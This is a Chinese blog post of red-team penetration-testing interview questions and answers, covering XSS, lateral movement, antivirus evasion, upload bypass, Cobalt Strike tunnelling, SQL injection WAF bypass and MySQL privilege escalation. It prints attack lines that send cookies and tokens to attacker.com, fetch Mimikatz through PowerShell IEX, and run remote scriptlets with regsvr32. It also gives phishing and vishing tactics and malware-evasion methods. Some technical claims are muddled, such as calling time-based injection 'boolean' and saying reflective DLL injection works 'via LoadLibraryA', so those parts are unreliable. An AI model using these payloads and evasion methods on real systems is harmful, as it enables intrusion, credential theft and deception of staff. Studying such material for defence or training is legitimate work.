当前位置：首页 > news >正文

2025年渗透测试面试题总结-渗透测试红队面试九（题目+回答）

news 来源：原创 2025/5/14 8:05:37

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

渗透测试红队面试九

一、XSS 设置 HTTP-Only 如何绕过

二、XSS 攻击手段分类

三、全杀软环境渗透策略

四、内网横向工具与协议

五、Fscan 崩溃处理方案

六、Apache/IIS 解析漏洞

七、PHP 文件上传绕过方式

八、工作组横向权限需求

九、域控查找方法

十、CDN 获取真实 IP

十一、判断邮箱类型

十二、验证真实 IP

十三、不出网机器上线 CS（Cobalt Strike）

十四、代理工具与杀软对抗

十五、免杀技术核心方法

十六、SQL 注入 Bypass 技术

十七、红队 HW 信息收集方式

十八、Whois 收集信息

十九、登录框利用方式

二十、Python/PHP 开发用途

二十一、代码审计思路

二十二、MySQL Getshell 前提

二十三、MySQL.ini 配置参数

二十四、Redis SSRF 内网攻击

二十五、UDF 提权步骤

二十六、安全学习资源推荐

渗透测试红队面试九
二百四十一、xss 设置http-only如何绕过二百四十二、xss攻击手段有哪些二百四十三、遇到全是杀软的工作组怎么办二百四十四、使用什么工具内网横向二百四十五、fscan扫机器崩了怎么办二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上传绕过方式（黑、白名单、解析漏洞）二百四十八、工作组横向需要用户什么权限二百四十九、如何查找域控（尽可能多的方式）二百五十、如何从cdn 真实ip二百五十一、如何判断邮箱类型二百五十二、如何确定你拿到的就是真实ip二百五十三、机器不出网如何上线到cs（不出网的机器是拿到wenshell的机器）二百五十四、走代理用哪些工具，遇到杀软怎么办二百五十五、如何免杀二百五十六、sql注入bypass有哪些（尽可能多说）二百五十七、平常红队hw信息收集方式有哪些二百五十八、whois 收集的信息包括哪些二百五十九、给一个登录框能想到哪些利用方式二百六十、平常开发经常用python 和php做什么二百六十一、代码审计的思路是什么二百六十二、mysql getshell的前提是什么二百六十三、其中需要mysql.ini 配置参数应该是怎样二百六十四、redis ssf 如何攻击内网，可以用到哪些协议二百六十五、说一下udf提权二百六十六、平常经常在哪些地方学习
一、XSS 设置 HTTP-Only 如何绕过

非 Cookie 窃取路径
直接请求伪造：利用 XSS 构造请求发送敏感数据（如 <img src="http://attacker.com?token=localStorage.getItem('auth')"> ）。
DOM 数据提取：读取页面隐藏字段（如 <script>exfil(document.forms[0].password.value)</script> ）。

客户端存储劫持
LocalStorage/SessionStorage：通过 JS 遍历存储并外传（需应用存储敏感数据）。
IndexedDB 导出：恶意脚本读取数据库内容（如用户历史记录）。

界面钓鱼攻击
伪造登录弹窗诱导用户输入账号密码，劫持后发送至攻击者服务器。

二、XSS 攻击手段分类

类型 攻击场景 示例
反射型 XSS URL 参数未过滤，即时触发 http://victim.com?search=<script>alert(1)</script>
存储型 XSS 恶意脚本持久化存储（如论坛评论）留言板插入 <img src=x onerror=stealCookie()>
DOM 型 XSS 前端渲染漏洞，无需服务端交互 eval(decodeURIComponent(location.hash))
盲打 XSS 攻击后台管理界面（如日志面板）插入 <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
mXSS 富文本编辑器过滤逻辑绕过 <a href="javascript:alert(1)">Click</a>

三、全杀软环境渗透策略
无文件攻击
PowerShell 内存加载：
powershellIEX (New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1') 
WMI 持久化：通过 WMI 事件订阅执行 payload（如 __EventFilter + CommandLineEventConsumer）。
白名单工具滥用
MsBuild 执行 C#：将恶意代码编译为临时程序集：
xml<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Target Name="Exec"> <Exec Command="calc.exe" /> </Target> </Project>
Regsvr32 加载远程脚本：
cmregsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll 
流量隐匿技术
域前置（Domain Fronting）：伪装流量至合法 CDN（如 Google 或 Cloudflare）。
HTTP/3 QUIC 协议：利用 UDP 特性规避传统 IDS 检测。
四、内网横向工具与协议

工具功能 典型命令
Impacket SMB/WMI/LDAP 协议攻击 psexec.py user:password@192.168.1.1
CrackMapExec 自动化凭证喷射与横向移动 cme smb 192.168.1.0/24 -u user -p password
Chisel 多协议隧道穿透 chisel server -p 8080 + chisel client attacker.com:8080 R:445:127.0.0.1:445
Proxychains 代理链流量路由 proxychains nmap -sT 10.10.10.1
Responder LLMNR/NBT-NS 毒化 responder -I eth0 -wrf

五、Fscan 崩溃处理方案
资源优化
分段扫描：拆分 IP 段为 /24 子网（fscan -h 192.168.1.1-255）。
线程控制：限制并发数为 50（-t 50）。

兼容性调整
协议过滤：禁用非常用协议（-noping -nobr）。
日志分析：启用 -debug 模式定位崩溃点（如特定协议解析错误）。
替代方案
切换至 RustScan（高性能端口扫描）：
bashrustscan -a 192.168.1.1/24 -- -sV -sC 
六、Apache/IIS 解析漏洞
Apache 漏洞
多后缀解析：.php.jpg 被解析为 PHP（需错误配置 AddHandler）。
.htaccess 覆盖：上传文件指定解析规则：
apacheAddType application/x-httpd-php .jpg 
IIS 漏洞
目录解析：/upload/test.asp/logo.jpg 被当作 ASP 执行（IIS 6.0）。
分号截断：file.asp;.jpg 被解析为 ASP（IIS 7.5 以下）。
七、PHP 文件上传绕过方式

黑名单绕过
特殊后缀：.phtml, .php7, .phar。
双写绕过：.pphphp → 过滤后变为 .php。

白名单+解析漏洞
MIME 类型伪造：修改 Content-Type: image/jpeg。
文件头伪造：添加合法文件头（如 GIF89a）。

服务器配置漏洞
路径拼接截断：filename="test.php .jpg"（空格截断）。
空字节截断（PHP<5.3）：test.php%00.jpg → 保存为 test.php 。

八、工作组横向权限需求

管理员权限：用于 PsExec、WMI 远程执行命令。
本地用户凭证：Pass-the-Hash 攻击（需 NTLM 哈希）。
文件共享写入权：上传后门至共享目录（如 \\192.168.1.1\C$\temp\shell.exe ）。

九、域控查找方法
DNS 查询：
bashnslookup -type=SRV _ldap._tcp.dc._msdcs.example.com 
命令探测：
cmdnet group "Domain Controllers" /domain 
LDAP 查询：通过端口 389 搜索 (objectCategory=computer) 且 (userAccountControl:1.2.840.113556.1.4.803:=8192)。
十、CDN 获取真实 IP

历史 DNS 记录：使用 SecurityTrails 或 DNSDumpster 查询域名解析历史。
子域名探测：mail.example.com 可能未使用 CDN。
SSL 证书匹配：通过 Censys 搜索相同证书的 IP。
邮件服务器追踪：触发密码重置邮件，检查邮件头中的 Received 字段。

十一、判断邮箱类型
MX 记录查询：
bashdig mx example.com 
Exchange：MX 指向 outlook.com 或自建服务器。
Google Workspace：MX 记录包含 google.com 。
Webmail 特征：
Exchange：登录页 URL 包含 /owa。
腾讯企业邮：mail.example.com 跳转至 exmail.qq.com 。
十二、验证真实 IP

全球 Ping 测试：使用 Ping.pe 检测多地响应 IP 是否一致。
端口扫描：真实 IP 可能开放非标准端口（如 22, 3389）。
HTTP 头对比：比较 CDN 与真实 IP 的 Server 或 X-Powered-By 头差异。

十三、不出网机器上线 CS（Cobalt Strike）
反向代理隧道
工具：reGeorg、Neo-reGeorg
bash# 上传 tunnel.jsp 至目标服务器 python neoreg.py generate -k password # 生成隧道脚本 python neoreg.py -k password -u http://victim.com/tunnel.jsp 
流量路由：通过隧道代理将本地端口映射到目标内网。
协议封装穿透
ICMP 隧道：使用 ptunnel-ng 将 TCP 流量封装为 ICMP 包。
DNS 隧道：通过 dnscat2 实现隐蔽通信：
bashdnscat2 --dns server=attacker.com,port=53 --secret=key
中间人跳板

利用已控主机作为代理（如通过 socks4a 协议转发流量）。
十四、代理工具与杀软对抗

工具功能 杀软绕过策略
Proxifier 全局流量代理白名单模式加载合法应用（如 Chrome）
SSHuttle VPN over SSH 加密流量混淆（如 AES-256-GCM）
Tor 匿名网络路由桥接节点（obfs4 混淆）
Nginx 反向代理伪装配置合法域名与 TLS 证书

十五、免杀技术核心方法

代码混淆

字符串加密：使用 AES 加密敏感函数名。
控制流平坦化：打乱代码逻辑（如 LLVM-Obfuscator）。

内存加载

反射型 DLL 注入：通过 LoadLibraryA 加载加密 payload。
Process Hollowing：替换合法进程内存（如 svchost.exe ）。

反沙箱检测

硬件指纹检查：检测 CPU 核心数、内存大小（沙箱通常配置低）。
延迟执行：休眠 10 分钟后触发 payload。

十六、SQL 注入 Bypass 技术

过滤类型 绕过方法 示例 Payload
关键字过滤 内联注释 /*!50000select*/ UNION/*!50000SELECT*/ 1,2,3
空格过滤 使用括号或换行符 %0a SELECT'1'%0aFROM
引号过滤 十六进制编码 0xHEX WHERE user=0x61646D696E
WAF 规则 分块传输编码（Chunked HTTP）将 payload 拆分为多个 chunk 发送
盲注优化 布尔盲注基于时间差 IF(1,SLEEP(5),0) ' OR IF(1,SLEEP(5),0)-- -

十七、红队 HW 信息收集方式

被动收集

证书透明度：查询 crt.sh 获取子域名。
GitHub 监控：搜索敏感关键词（如 password, api_key）。

主动扫描

资产测绘：使用 FOFA 搜索 title="企业后台"。
端口服务：Masscan 快速扫描全网段开放端口。

社会工程

钓鱼邮件：伪造 HR 通知诱导点击恶意链接。
电话钓鱼：伪装 IT 部门要求提供 VPN 凭据。

十八、Whois 收集信息

基础信息

域名注册商、注册日期、过期时间。
管理员姓名、邮箱（如 admin@example.com ）。

网络信息

DNS 服务器地址（如 ns1.cloudflare.com ）。
IP 地址段归属（如 ASN 号码）。

关联分析

同一注册人关联的其他域名。

十九、登录框利用方式

漏洞利用

SQL 注入：admin'-- 绕过密码验证。
弱口令爆破：Top 1000 密码字典攻击。

逻辑漏洞

密码重置功能绕过（如修改 userid 参数）。
验证码未校验（重放攻击）。

前端攻击

修改 JS 代码禁用客户端验证。

二十、Python/PHP 开发用途

语言 典型场景 工具/框架
Python 渗透测试脚本（如爬虫、漏洞扫描） Scrapy、Requests、SQLMap API
PHP Web 后门（如一句话木马） Laravel（伪装正常业务逻辑）

二十一、代码审计思路

入口点分析
用户输入点：$_GET, $_POST, 文件上传。

危险函数追踪
PHP：system(), eval(), include()。
Java：Runtime.exec(), JNDI lookup。

数据流追踪
从输入点到敏感操作（如数据库查询、文件写入）。

二十二、MySQL Getshell 前提

权限要求
FILE 权限（GRANT FILE ON *.* TO 'user'@'%'）。

写文件路径
确定可写目录（通过 @@secure_file_priv）。

Web 目录已知
上传 WebShell 至可通过 URL 访问的路径。

二十三、MySQL.ini 配置参数
ini[mysqld] secure_file_priv = "" # 允许导出到任意目录 local_infile = ON # 允许加载本地文件
二十四、Redis SSRF 内网攻击

协议利用

HTTP：探测内网 Web 服务（redis-cli -h 内网IP -p 80）。
Gopher：构造攻击包攻击内网服务（如 FastCGI RCE）。

工具自动化

SSRFmap：自动化探测与利用内网漏洞。

二十五、UDF 提权步骤
上传共享库
编译恶意 .so 或 .dll 文件（如 lib_mysqludf_sys.so ）。
创建函数
sqlCREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; 
执行命令
sqlSELECT sys_eval('whoami');
二十六、安全学习资源推荐

平台
漏洞库：CVE Details、Exploit-DB。
社区：Reddit r/netsec、先知社区。

实践平台
Hack The Box、TryHackMe。

文献
《内网安全攻防：渗透测试实战指南》（2024版）。

类型	攻击场景	示例
反射型 XSS	URL 参数未过滤，即时触发	`http://victim.com?search=<script>alert(1)</script>`
存储型 XSS	恶意脚本持久化存储（如论坛评论）	留言板插入 `<img src=x onerror=stealCookie()>`
DOM 型 XSS	前端渲染漏洞，无需服务端交互	`eval(decodeURIComponent(location.hash))`
盲打 XSS	攻击后台管理界面（如日志面板）	插入 `<script>fetch('http://attacker.com?cookie='+document.cookie)</script>`
mXSS	富文本编辑器过滤逻辑绕过	`<a href="javascript:alert(1)">Click</a>`

工具	功能	典型命令
Impacket	SMB/WMI/LDAP 协议攻击	`psexec.py user:password@192.168.1.1`
CrackMapExec	自动化凭证喷射与横向移动	`cme smb 192.168.1.0/24 -u user -p password`
Chisel	多协议隧道穿透	`chisel server -p 8080` + `chisel client attacker.com:8080 R:445:127.0.0.1:445`
Proxychains	代理链流量路由	`proxychains nmap -sT 10.10.10.1`
Responder	LLMNR/NBT-NS 毒化	`responder -I eth0 -wrf`

工具	功能	杀软绕过策略
Proxifier	全局流量代理	白名单模式加载合法应用（如 Chrome）
SSHuttle	VPN over SSH	加密流量混淆（如 AES-256-GCM）
Tor	匿名网络路由	桥接节点（obfs4 混淆）
Nginx	反向代理伪装	配置合法域名与 TLS 证书

过滤类型	绕过方法	示例 Payload
关键字过滤	内联注释 `/!50000select/`	`UNION/!50000SELECT/ 1,2,3`
空格过滤	使用括号或换行符 `%0a`	`SELECT'1'%0aFROM`
引号过滤	十六进制编码 `0xHEX`	`WHERE user=0x61646D696E`
WAF 规则	分块传输编码（Chunked HTTP）	将 payload 拆分为多个 chunk 发送
盲注优化	布尔盲注基于时间差 `IF(1,SLEEP(5),0)`	`' OR IF(1,SLEEP(5),0)-- -`

语言	典型场景	工具/框架
Python	渗透测试脚本（如爬虫、漏洞扫描）	Scrapy、Requests、SQLMap API
PHP	Web 后门（如一句话木马）	Laravel（伪装正常业务逻辑）